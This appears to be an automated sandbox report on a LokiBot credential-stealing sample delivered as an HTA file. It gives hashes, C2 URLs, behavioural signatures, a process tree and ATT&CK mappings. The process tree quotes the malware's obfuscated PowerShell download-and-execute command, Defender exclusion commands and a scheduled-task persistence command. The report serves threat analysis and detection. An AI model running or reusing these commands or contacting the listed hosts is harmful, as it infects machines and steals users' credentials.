Analysis
max time kernel: 122s
max time network: 124s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 20-11-2024 07:06
Static task: static1
Behavioral task: behavioral1
  Sample: greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
  Resource: win10v2004-20241007-en
General
Target: greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Size: 178KB
MD5: 4ce3b0e612e1968b6c491ab1ab818884
SHA1: cbc890a816e9b7e993c90fb63d51526a76616323
SHA256: a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
SHA512: 9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816
SSDEEP: 96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q
Malware Config
Extracted config (family: lokibot)
URLs:
- http://94.156.177.41/simple/five/fre.php
- http://kbfvzoboss.bid/alien/fre.php
- http://alphastand.trade/alien/fre.php
- http://alphastand.win/alien/fre.php
- http://alphastand.top/alien/fre.php
Signatures

Lokibot family

Blocklisted process makes network request (1 IoC)
flow 4, PID 1616, pOweRShelL.EXe

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
PID 2952, powershell.exe
PID 2972, powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment (2 IoCs)
PID 1616, pOweRShelL.EXe
PID 2468, powershell.exe

Executes dropped EXE (2 IoCs)
PID 2652, caspol.exe
PID 2332, caspol.exe

Loads dropped DLL (3 IoCs)
PID 1616, pOweRShelL.EXe (3 events)

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Key opened: \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (caspol.exe)
Key opened: \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (caspol.exe)
Key opened: \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (caspol.exe)

Suspicious use of SetThreadContext (1 IoC)
PID 2652 (caspol.exe) set thread context of PID 2332, procid_target 44

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 9 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Opened by: powershell.exe, caspol.exe, powershell.exe, powershell.exe, schtasks.exe, mshta.exe, pOweRShelL.EXe, csc.exe, cvtres.exe

Modifies Internet Explorer settings
Key created: \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
PID 1440, schtasks.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
PID 1616 pOweRShelL.EXe; PID 2468 powershell.exe; PID 2652 caspol.exe; PID 2952 powershell.exe; PID 2972 powershell.exe; PID 2652 caspol.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Token: SeDebugPrivilege, PID 1616 pOweRShelL.EXe
Token: SeDebugPrivilege, PID 2468 powershell.exe
Token: SeDebugPrivilege, PID 2652 caspol.exe
Token: SeDebugPrivilege, PID 2952 powershell.exe
Token: SeDebugPrivilege, PID 2972 powershell.exe
Token: SeDebugPrivilege, PID 2332 caspol.exe

Suspicious use of WriteProcessMemory (42 IoCs)
source PID wrote to memory of target PID (source process, procid_target, event count)
1700 wrote to memory of 1616 (mshta.exe, 30, 4 events)
1616 wrote to memory of 2468 (pOweRShelL.EXe, 32, 4 events)
1616 wrote to memory of 2804 (pOweRShelL.EXe, 33, 4 events)
2804 wrote to memory of 2240 (csc.exe, 34, 4 events)
1616 wrote to memory of 2652 (pOweRShelL.EXe, 37, 4 events)
2652 wrote to memory of 2952 (caspol.exe, 38, 4 events)
2652 wrote to memory of 2972 (caspol.exe, 40, 4 events)
2652 wrote to memory of 1440 (caspol.exe, 42, 4 events)
2652 wrote to memory of 2332 (caspol.exe, 44, 10 events)
outlook_office_path (1 IoC)
Key opened: \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (caspol.exe)

outlook_win_path (1 IoC)
Key opened: \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (caspol.exe)
Processes

[depth 1] C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID: 1700

C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1616

[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2468

[depth 3] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tkwfij9z.cmdline"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2804

[depth 4] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAC8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAC7.tmp"
- System Location Discovery: System Language Discovery
PID: 2240

[depth 3] C:\Users\Admin\AppData\Roaming\caspol.exe
Command line: "C:\Users\Admin\AppData\Roaming\caspol.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2652

[depth 4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2952

[depth 4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2972

[depth 4] C:\Windows\SysWOW64\schtasks.exe
Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3968.tmp"
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID: 1440

[depth 4] C:\Users\Admin\AppData\Roaming\caspol.exe
Command line: "C:\Users\Admin\AppData\Roaming\caspol.exe"
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID: 2332

Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter: PowerShell (1)
- Scheduled Task/Job: Scheduled Task (1)
Credential Access
- Credentials from Password Stores: Credentials from Web Browsers (1)
- Unsecured Credentials: Credentials In Files (1)
Downloads